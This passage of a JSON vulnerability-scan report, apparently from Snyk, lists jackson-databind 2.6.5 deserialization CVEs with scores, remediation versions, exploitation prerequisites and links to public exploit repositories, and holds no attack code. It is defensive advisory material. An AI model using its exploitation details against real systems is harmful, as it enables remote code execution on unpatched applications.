"[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + 